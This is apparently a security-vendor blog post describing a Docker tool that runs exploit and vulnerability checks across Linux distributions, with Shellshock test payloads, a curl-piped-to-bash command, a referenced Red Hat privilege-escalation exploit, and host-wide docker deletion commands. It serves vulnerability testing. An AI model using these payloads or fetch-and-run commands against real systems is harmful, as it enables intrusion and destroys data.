Cross Distribution Exploit Testing

Introduction:

Faraday News
Faraday
Jul 27, 2015

We were looking for an easy way to test the installation of our tool, Faraday (https://github.com/infobyte/faraday), on different distributions.

We wanted this because installation is usually one of the most complicated and critical steps in adopting any new tool. The process has to be easy and has to work without hiccups, so that users can start using the tool as soon as possible instead of losing valuable time on installation and set-up.

What we ended up finding to suit our needs was Docker, which is pretty similar to a chroot, but on large amounts of steroids.

Docker is a tool that automates the deployment of applications inside software containers by providing an additional layer of abstraction and automation of operating-system-level virtualization on Linux. Docker uses resource isolation features of the Linux kernel, such as cgroups and kernel namespaces, to let independent "containers" run within a single Linux instance, avoiding the overhead of starting and maintaining virtual machines.

The process we developed is pretty simple and works from a plain list of distributions:

  1. We build a Docker image for the distribution
  2. We install Faraday in it
  3. We connect to the container over SSH with X forwarding and launch the graphical application (Qt GUI)

If any of these steps fails, we look at what caused the problem and write the patch that fixes it.

We are using this process daily in our own continuous-integration system.

Cross Distribution Exploit Testing:

The same setup can be used to run exploitation tests on different distributions. This lets us evaluate different scenarios and hopefully makes our exploits a bit more robust :)

Not every vulnerability can be tested this way: kernel-related bugs can't be exploited because Docker isn't a virtualization system. Every container shares the host's kernel, so a kernel exploit would be thrown at the host rather than at the distribution under test. Userland vulnerabilities are fine, and that still covers plenty of common bugs: file permission problems, file race conditions, environment variable code injection, and so on.

The tool contains the following elements:

  • docker_build.py: Builds an image for each distribution and then runs docker_launcher.py against it.
  • docker_launcher.py: Connects to the selected container over SSH and executes our command inside it.
  • images.txt: The list of base images to use.
  • extras/: Libraries and the base Dockerfile used to generate the images.
  • root/: Files copied into the images, including the SSH keys used for the connection, which the GUI tests need.
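As an added illustration of the loop described above (this is not the distro_checker code; the project's own scripts are the Python files listed), here is a minimal shell version that builds an sshd-enabled image per distribution, starts it, and then runs an install command followed by a test command over ssh -X. The Dockerfile contents, the keys/ directory in the build context, the images.txt format with # comments, the "<8 hex>-<4 hex>_<image>" tag shape, and the package-manager choice by image name are all assumptions made for this example; the base images are assumed to have a working package manager.

```shell
#!/bin/sh
# Added example, not the distro_checker code: a minimal version of the
# build -> install -> ssh loop. Assumptions: images.txt lists one base
# image per line ("#" lines are comments), keys/id_rsa and keys/id_rsa.pub
# are a throwaway key pair in the build context, and the caller passes the
# install command for the tool under test.

# Read the image list, dropping blank and comment lines.
list_images() {
    grep -v '^[[:space:]]*#' "$1" | grep -v '^[[:space:]]*$'
}

# Emit a Dockerfile that turns one base image into an sshd-enabled box
# that accepts our public key. The package manager is picked from the
# image name; anything unrecognised is assumed to be Debian-like.
gen_dockerfile() {
    case "$1" in
        centos*|fedora*|rhel*)
            pkg='yum install -y openssh-server openssh-clients && ssh-keygen -q -N "" -t rsa -f /etc/ssh/ssh_host_rsa_key' ;;
        *)
            pkg='apt-get update && apt-get install -y openssh-server' ;;
    esac
    printf '%s\n' \
        "FROM $1" \
        "RUN $pkg" \
        'RUN mkdir -p /var/run/sshd /root/.ssh && chmod 700 /root/.ssh' \
        'COPY keys/id_rsa.pub /root/.ssh/authorized_keys' \
        'RUN chmod 600 /root/.ssh/authorized_keys' \
        'EXPOSE 22' \
        'CMD ["/usr/sbin/sshd", "-D"]'
}

# A fresh "<8 hex>-<4 hex>" run id, in the shape the tool's output shows,
# so every run gets its own image and container.
new_run_id() {
    hex=$(od -An -N6 -tx1 /dev/urandom | tr -d ' \n')
    printf '%s-%s\n' "$(printf '%s' "$hex" | cut -c1-8)" "$(printf '%s' "$hex" | cut -c9-12)"
}

# For every image listed in $1: build, start, then run the install command
# $2 and the test command $3 over ssh with X forwarding, using private key $4.
run_all() {
    list_images "$1" | while IFS= read -r base; do
        img="$(new_run_id)_$base"
        name=$(printf '%s' "$img" | tr ':' '-')   # container names may not contain ':'
        gen_dockerfile "$base" > Dockerfile
        docker build -t "$img" . || { echo "build failed: $base" >&2; continue; }
        docker run -d --name "$name" "$img" >/dev/null
        ip=$(docker inspect -f '{{.NetworkSettings.IPAddress}}' "$name")
        sleep 2   # give sshd a moment to come up
        # Host-key checking is disabled on purpose: the peer is a throwaway
        # container on the local bridge whose host key changes on every build.
        for cmd in "$2" "$3"; do
            ssh -i "$4" -t -t -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null \
                -o LogLevel=quiet -X "root@$ip" "$cmd"
        done
    done
}

# Usage: sh distro_loop.sh images.txt '<install command>' '<test command>' keys/id_rsa
if [ "$#" -eq 4 ]; then
    run_all "$1" "$2" "$3" "$4"
fi
```

The last argument plays the role of the tool's -c option. Disabling host-key checking is acceptable here only because the target is a container that this script just created on the host's own bridge; against any other machine keep StrictHostKeyChecking on.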

Case 1 — Shellshock:

A simple example to try would be shellshock:

$ ./docker_build.py -c "env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\""

Start build docker: debian:7.3

..
Run build docker: debian:7.3, id: fae1bc04-b514_debian:7.3
./docker_launcher.py -c 'env x='() { :;}; echo vulnerable' bash -c "echo this is a test"' -t fae1bc04-b514_debian:7.3
['ssh', '-i', '/root/dev/distro_checker/extras/docker/faraday-docker.prv', '-t', '-t', '-oStrictHostKeyChecking=no', '-o UserKnownHostsFile=/dev/null', '-o LogLevel=quiet', '-X', u'root@172.17.0.93', 'env x='() { :;}; echo vulnerable' bash -c "echo this is a test"']
vulnerable
this is a test
Run build docker: ubuntu:14.10, id: a07132a4-af14_ubuntu:14.10
./docker_launcher.py -c 'env x='() { :;}; echo vulnerable' bash -c "echo this is a test"' -t a07132a4-af14_ubuntu:14.10
['ssh', '-i', '/root/dev/distro_checker/extras/docker/faraday-docker.prv', '-t', '-t', '-oStrictHostKeyChecking=no', '-o UserKnownHostsFile=/dev/null', '-o LogLevel=quiet', '-X', u'root@172.17.0.94', 'env x='() { :;}; echo vulnerable' bash -c "echo this is a test"']
this is a test

This builds two images (debian:7.3 and ubuntu:14.10) and runs the CVE-2014-6271 check in each: the Debian 7.3 image prints "vulnerable" before the test string, while the Ubuntu 14.10 image prints only the test string, so its bash is already patched.

A script keeps this a bit more organized:

$ ./docker_build.py -c "cd build && ./shellshocker.sh" # docker_build.py copies everything under ./root/build into the images

Run build docker: debian:7.3, id: 75b78a22-03a1_debian:7.3

CVE-2014-6271 (original shellshock): VULNERABLE

./shellshock_test2.sh: line 17: 29 Segmentation fault shellshocker="() { x() { _;}; x() { _;} <<a; }" bash -c date 2> /dev/null

CVE-2014-6277 (segfault): VULNERABLE

CVE-2014-6278 (Florian's patch): VULNERABLE

CVE-2014-7169 (taviso bug): VULNERABLE

CVE-2014-7186 (redir_stack bug): not vulnerable

CVE-2014-7187 (nested loops off by one): not vulnerable

CVE-2014-//// (exploit 3 on http://shellshocker.net/): not vulnerable
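The per-CVE checks such a script runs, written out as an added example: this is our own reconstruction from the public test payload for each CVE, not the shellshocker.sh script above nor the shellshocker.net one, and it may differ from what they do. Each check returns 0 for vulnerable, 1 for not vulnerable and 2 if no bash is found; BASH_BIN is an assumed variable for pointing the checks at another bash. Drop it under root/build and invoke it with -c the same way as the script above.

```shell
#!/bin/sh
# Added example, not the shellshocker.sh script used above: one check per
# Shellshock CVE, using the public test payload for each. Every check
# returns 0 (vulnerable), 1 (not vulnerable) or 2 (could not test: no bash
# found). BASH_BIN is an assumption so that a different bash can be probed.

BASH_BIN=${BASH_BIN:-bash}

have_bash() { command -v "$BASH_BIN" >/dev/null 2>&1; }

# Run a command with all output dropped and succeed only if it died from a
# signal (status 128 or more). The extra "exit" keeps the shell from
# exec'ing the command directly, so the "Segmentation fault" notice lands
# on the subshell's (discarded) stderr instead of in the report.
crashed() {
    rc=0
    ( "$@"; exit $? ) >/dev/null 2>&1 || rc=$?
    [ "$rc" -ge 128 ]
}

# CVE-2014-6271: commands after a function body in an imported env var run.
check_cve_2014_6271() {
    have_bash || return 2
    out=$(env x='() { :;}; echo vulnerable' "$BASH_BIN" -c 'echo test' 2>/dev/null)
    case "$out" in *vulnerable*) return 0 ;; *) return 1 ;; esac
}

# CVE-2014-7169: the first fix left the parser confused; the dangling
# redirection makes bash create a file named "echo" in the working directory.
check_cve_2014_7169() {
    have_bash || return 2
    d=$(mktemp -d) || return 2
    ( cd "$d" && env X='() { (a)=>\' "$BASH_BIN" -c 'echo date' ) >/dev/null 2>&1
    rc=1; [ -e "$d/echo" ] && rc=0
    rm -rf "$d"
    return $rc
}

# CVE-2014-6277: parser crash (the segfault seen in the output above).
check_cve_2014_6277() {
    have_bash || return 2
    if crashed env shellshocker='() { x() { _;}; x() { _;} <<a; }' "$BASH_BIN" -c date; then return 0; fi
    return 1
}

# CVE-2014-6278: code execution that survived the CVE-2014-6271 patch.
check_cve_2014_6278() {
    have_bash || return 2
    out=$(env shellshocker='() { _; } >_[$($())] { echo vulnerable; }' "$BASH_BIN" -c : 2>/dev/null)
    case "$out" in *vulnerable*) return 0 ;; *) return 1 ;; esac
}

# CVE-2014-7186: too many here-documents overflow redir_stack and crash bash.
check_cve_2014_7186() {
    have_bash || return 2
    if crashed "$BASH_BIN" -c 'true <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF <<EOF'; then return 0; fi
    return 1
}

# CVE-2014-7187: 200 nested "for" loops hit an off-by-one in word_lineno.
check_cve_2014_7187() {
    have_bash || return 2
    script=$(i=0; while [ $i -lt 200 ]; do echo "for x$i in ; do :"; i=$((i+1)); done
             i=0; while [ $i -lt 200 ]; do echo done; i=$((i+1)); done)
    if crashed "$BASH_BIN" -c "$script"; then return 0; fi
    return 1
}

# One line per CVE, in the style of the script output above.
shellshock_report() {
    for n in 6271 7169 6277 6278 7186 7187; do
        st=0; "check_cve_2014_$n" || st=$?
        case $st in 0) s=VULNERABLE ;; 1) s='not vulnerable' ;; *) s='could not test' ;; esac
        echo "CVE-2014-$n: $s"
    done
}

shellshock_report
```

The crash-based checks (6277, 7186, 7187) treat a bash killed by a signal as vulnerable, which is exactly what the segfault line in the output above is telling you. A result of "could not test" means the container has no bash on PATH, not that it is safe.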

For a more automated run, use the -i option, which takes the list of images to iterate over:

$ ./docker_build.py -c "curl https://shellshocker.net/shellshock_test.sh | bash" -i images.txt

Keep in mind that this pipes whatever shellshocker.net serves straight into bash as root inside each container. That is fine for a throwaway container, but review the script before running it anywhere else.

To re-run something specific against a container that already exists, all you need to do is:

$ docker ps -a # find the generated container and pass its id to docker_launcher.py with the -t option

$ ./docker_launcher.py -c "whoami" -t c92d6bf7-d559_debian:7.3

Case 2: Red Hat Local Privilege Escalation CVE-2015-3245 and CVE-2015-3246:

Last week two vulnerabilities were published that, chained together, give a local privilege escalation on Red Hat 6 and 7:

CVE-2015-3245: userhelper chfn() newline filtering
CVE-2015-3246: libuser passwd file handling

Let's run the tool again against these vulnerabilities on rhel6.5, rhel7.0, rhel7.1 and fedora:20:

$ ./docker_build.py -i redhat_images.txt -d extras/docker/Dockerfile.redhat -c id # Here I use a specific Dockerfile that runs the exploit (roothelper.c) directly

Distros: ['rhel6.5', 'rhel7.0', 'rhel7.1', 'fedora:20']

Start build docker: rhel6.5

Red Hat Enterprise Linux Server release 6.5 (Santiago)
CVE-2015-(3245,3246): VULNERABLE

Start build docker: rhel7.0
Red Hat Enterprise Linux Server release 7.0 (Maipo)
CVE-2015-(3245,3246): VULNERABLE

Start build docker: rhel7.1
Red Hat Enterprise Linux Server release 7.1 (Maipo)
CVE-2015-(3245,3246): VULNERABLE

Start build docker: fedora:20
Fedora release 20 (Heisenbug)
CVE-2015-(3245,3246): Not vulnerable

Demo:

Clean:

After a few tests, don't forget to stop the containers and delete them:

$ docker stop $(docker ps -a -q)
$ docker rm $(docker ps -a -q)

And the images as well:

$ docker rmi $(docker images -q)

Keep in mind that these three commands act on every container and image on the host, not only the ones the tool created, so on a shared Docker host delete by id instead.
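A scoped version of that clean-up, as an added example that is not part of distro_checker: it removes only the containers and images whose image name carries the "<8 hex>-<4 hex>_<distro>" prefix visible in the output above. It assumes that prefix is unique to the tool's images and that the docker CLI supports --format on ps and images; the selection is kept in a function of its own so it can be checked on a constructed list before it is wired to anything destructive.

```shell
#!/bin/sh
# Added example, not part of distro_checker: the three commands above wipe
# every container and image on the host. This variant only touches the
# ones whose image name carries the "<8 hex>-<4 hex>_<distro>" prefix the
# tool's output shows. Assumptions: that prefix is unique to the tool, and
# the docker CLI supports --format on "ps" and "images".

TOOL_PREFIX='^[0-9a-f]\{8\}-[0-9a-f]\{4\}_'

# stdin: "<id> <ref>" lines; stdout: the ids whose ref matches TOOL_PREFIX.
ids_for_tool() {
    while read -r id ref rest; do
        if printf '%s\n' "$ref" | grep -q "$TOOL_PREFIX"; then
            printf '%s\n' "$id"
        fi
    done
}

# Show what would be removed, without removing anything.
list_tool_artifacts() {
    docker ps -a --format '{{.ID}} {{.Image}}' | ids_for_tool | sed 's/^/container /'
    docker images --format '{{.ID}} {{.Repository}}:{{.Tag}}' | ids_for_tool | sed 's/^/image /'
}

# Stop and remove the tool's containers, then remove its images.
clean_tool_artifacts() {
    docker ps -a --format '{{.ID}} {{.Image}}' | ids_for_tool | while read -r c; do
        docker stop "$c" >/dev/null && docker rm "$c" >/dev/null
    done
    docker images --format '{{.ID}} {{.Repository}}:{{.Tag}}' | ids_for_tool | while read -r i; do
        docker rmi "$i" >/dev/null
    done
}

# Usage: sh clean_tool.sh --list   (dry run)
#        sh clean_tool.sh --run    (actually delete)
case "${1:-}" in
    --list) list_tool_artifacts ;;
    --run)  clean_tool_artifacts ;;
esac
```

Run it with --list first; the dry run is the whole point of separating the selection from the docker stop/rm/rmi calls.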

Tool:

The code can be found on github:
http://github.com/infobyte/distro_checker

To-Do:

Doing the same thing with Vagrant would let us test every kind of vulnerability, kernel bugs included, because that would be a full virtualization setup.

We hope this helps everyone who needs to test across a wide range of distributions, from researchers testing their exploits to developers testing their code.

Thanks Andres for the support!
